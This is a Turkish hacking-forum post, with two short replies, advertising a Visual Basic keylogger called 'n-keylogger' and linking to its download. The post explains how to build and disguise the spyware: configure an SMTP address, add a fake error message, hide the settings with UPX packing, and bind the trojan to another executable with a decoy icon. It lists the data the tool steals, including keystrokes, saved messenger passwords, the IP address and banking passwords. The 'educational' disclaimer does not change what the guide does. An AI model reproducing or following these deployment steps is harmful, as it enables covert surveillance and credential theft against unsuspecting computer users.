Türk Keylogger [n-keylogger](resimli) karsındakının ne yaptıgından haberin olsun

maynaq

Yeni üye
12 Eki 2006
8
1
Türk Keylogger [n-keylogger]

n-keylogger, kendi türünde piyasada bulabileceğiniz en iyi casus yazılımlarından biridir. Görevi, klavyede basılan her tuşu o tuşun basıldığı pencere altında göstererek bunu periyodik bir biçimde e-mail adresinize göndermektir. Ayrıca gönderdiği mailin içeriğine ek bilgi olarak bilgisayarda yüklü olan chat programlarındaki kayıtlı şifreleri, bilgisayar adını ve IP adresini de ekler. Bu sayede söz konusu bilgisayar hakkında fazlasıyla bilgi edinme şansı yakalarsınız.

Yukarıdaki resimde gördüğünüz mailler, n-keylogger casusunun bulunduğu bilgisayarlardan gönderilen raporlardır
ljv_1.jpg
XbR_2.jpg
Yukarıdaki resimde ise n-keylogger casusunun bulunduğu bir bilgisayarın kullanıcısının chat yaptığı arkadaşıyla arasında geçen bir diyalog görülüyor. n-keylogger’ın bu özelliği, kullanıcıların bir çok yerde işine yarayabilir. Mesela bankaların internet bankacılığı hizmetlerinden yararlanan kişiler, şifrelerini sanal klavye aracılığı ile girmek yerine normal klavye ile girdiği zaman bunun nasıl bir sonuç doğurabileceğini, dolayısı ile sanal klavyenin ne kadar faydalı bir şey olduğunu öğrenebilirler.

n-keylogger’ın yapılış amacı asla yasadışı işler yapmak değil, aksine yapılabilecek bir yasadışı saldırının ne kadar tehlikeli olduğunu görebilmektir.

n-keylogger ile yapılan yasadışı işlerin sorumluluğu kesinlikle programın yapımcılarının sorumluluğu dışındadır. Programı kullanan kişiler program ile yaptığı her işin sorumluluğunu kabul etmiş sayılır.

KULLANIMI

n-keylogger’ın genel görünüşü böyledir


Trojan oluşturmak:

n-keylogger’da trojan oluşturmak için öncelikle Hotmail dışında bir mail adresinizin olması gerekmektedir. n-keylogger, Hotmail adreslerine kesinlikle mail göndermemektedir. Mail adresi yazan bölüme Hotmail dışındaki bir adresinizi yazıp, SMTP Server Adresi bölümüne ise girdiğiniz mail adresinin bulunduğu servisin SMTP Server Adresini girmelisiniz. Eğer girdiğiniz mail adresi gmail uzantılı ise seçeceğiniz
server Google’ın serverlarından biri olmalıdır. Eğer yahoo uzantılı bir adres girdiyseniz seçeceğiniz server Yahoo’nun serverlarından biri olmalıdır. Mail adresinizi ve SMTP Server adresinizi girdikten sonra eğer isterseniz sahte bir hata mesajı girebilirsiniz. Bu mesaj yalnızca n-keylogger server’ının bilgisayarda ilk çalışmasında gösterilir. Dilerseniz girdiğiniz hata mesajını Test Et butonuna basarak görebilirsiniz.
Bu bilgileri girdikten sonra server’ın çalışmasıyla ilgili ayarlar vardır. Trojan oluşturulurken Upx - Ultimate Packer for eXecutables - ile sıkıştır seçeneğini seçtiğiniz zaman n-keylogger serverı sıkıştırılır ve olduğundan yaklaşık yarı yarıya daha küçük bir hale gelir. Bu sayede hem server dosya ile birleştirildiği zaman dosya büyüklüğünde fazla bir artış görülmez, hem de server bir editor ile incelendiği zaman yazılan ayarlar görülemez.

Bu ayarların tamamını yaptığınız zaman programın genel görünüşü şu şekilde olmalıdır

gOD_4.jpg


Şimdi Trojan Oluştur butonuna basarak server’ımızı oluşturabiliriz.

Eğer istemediğiniz halde oluşturduğunuz “server.exe” bilgisayarınızda çalışmaya başladı ise, ilk çalışmasından 60 saniye geçtikten sonra Trojan Temizle butonuyla sisteminize yerleşen n-keylogger server’ını bilgisayarınızdan tamamen silebilirsiniz.


Dosyayla Birleştirme

“server.exe” isimli dosya oluştuktan sonra dilerseniz bunu başka bir dosya ile birleştirebilirsiniz. Bunu yapmak için öncelikle Dosyayla Birleştir butonuna tıklayarak birleştirme panelini açmalısınız. Bu panelin görünüşü şu şekildedir.


O3V_5.jpg


Dosya 1 yazan bölüme oluşturduğunuz “server.exe” isimli dosyayı seçmelisiniz.

Dosya 2 yazan bölüme “server.exe” ile birleştiği zaman görünecek olan ikinci dosyayı seçmelisiniz.

Yeni Dosya yazan bölüme Dosya 1 ve Dosya 2 birleştiği zaman birleşmiş halinin nerede oluşacağını girmelisiniz. Bu dosya mutlaka exe uzantılı olmalıdır!

Icon bölümüne ise, oluşacak yeni dosyanın görünecek olan simgesini girmelisiniz. Icon dosyaları ico uzantılı olan dosyalardır. Eğer bir ico dosyasına sahip değilseniz, n-keylogger’da bulunan icon dosyalarından birini seçebilirsiniz. Icon seçme ekranının görüntüsü şöyledir.


0YX_6.jpg


Birleştirme panelini doldurduğunuz zaman şu şekilde bir görünüm olmalıdır.

dc1_7.jpg


Son olarak birleştir butonuna basarak dosyaları birleştirebilirsiniz.

Özellikleri

Gönderdiği ek bilgiler:

MSN Messenger
Windows Messenger
Yahoo Messenger (5.x ve 6.x)
ICQ Lite 4.x/2003
AOL Instant Messenger/Netscape 7
Trillian
Miranda
GAIM
Google Talk

Yukarıda sıralanmış olan chat programlarında kayıtlı olan tüm şifreler klavyede basılan her tuşun gönderildiği rapora eklenir ve size bilgisayarın açık olduğu her 50 dakikada bir mail olarak gönderilir. Eğer bilgisayar 50 dakika açık kalmazsa, alınan loglar kaydedilir ve bilgisayar yeniden çalıştığı zaman bunların üzerine devam eder.

n-keylogger’ın programlamasında katkıda bulunanlar: Nirsoft, Upx
n-keylogger v1.3, Microsoft Visual Basic 6.0 kullanılarak 2006 yılında programlanmıştır.


n-keylogger’ın çıkarılacak olan 2. versiyonunda keylogging özelliğine uzaktan bağlantı özelliği dahil edilecektir, böylece kullanıcı kontrol altında tutmak istedi bilgisayar üzerinde daha büyük yetkilere sahip olabilecektir.

Versiyon Kontrolü Yap düğmesi ile n-keylogger’ın son versiyonunu ve nereden temin edebileceğinizi öğrenebilirsiniz. Program üreticisi nailgg'dir


QZc_3.jpg
http://rapidshare.com/files/13622044..._1_.3.rar.html
 

yakisikli19

Yeni üye
30 Tem 2007
9
0
abi ben bunu rardan çıkartamıyorum virüs diye ennellyo virüs programını kapatttım yıne eggellıyo nasıl açacam bunu bı yardım isterseiz (MSN Yasak) adresınede ulasabilirsiniz
 
Moderatör tarafında düzenlendi:

turkmodel

Yeni üye
20 Kas 2008
23
0
kardeş,
senin keylogger biraz sorunlu,
bence daha fazla kimsenin canı yanmadan kaldır linkini. :(
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.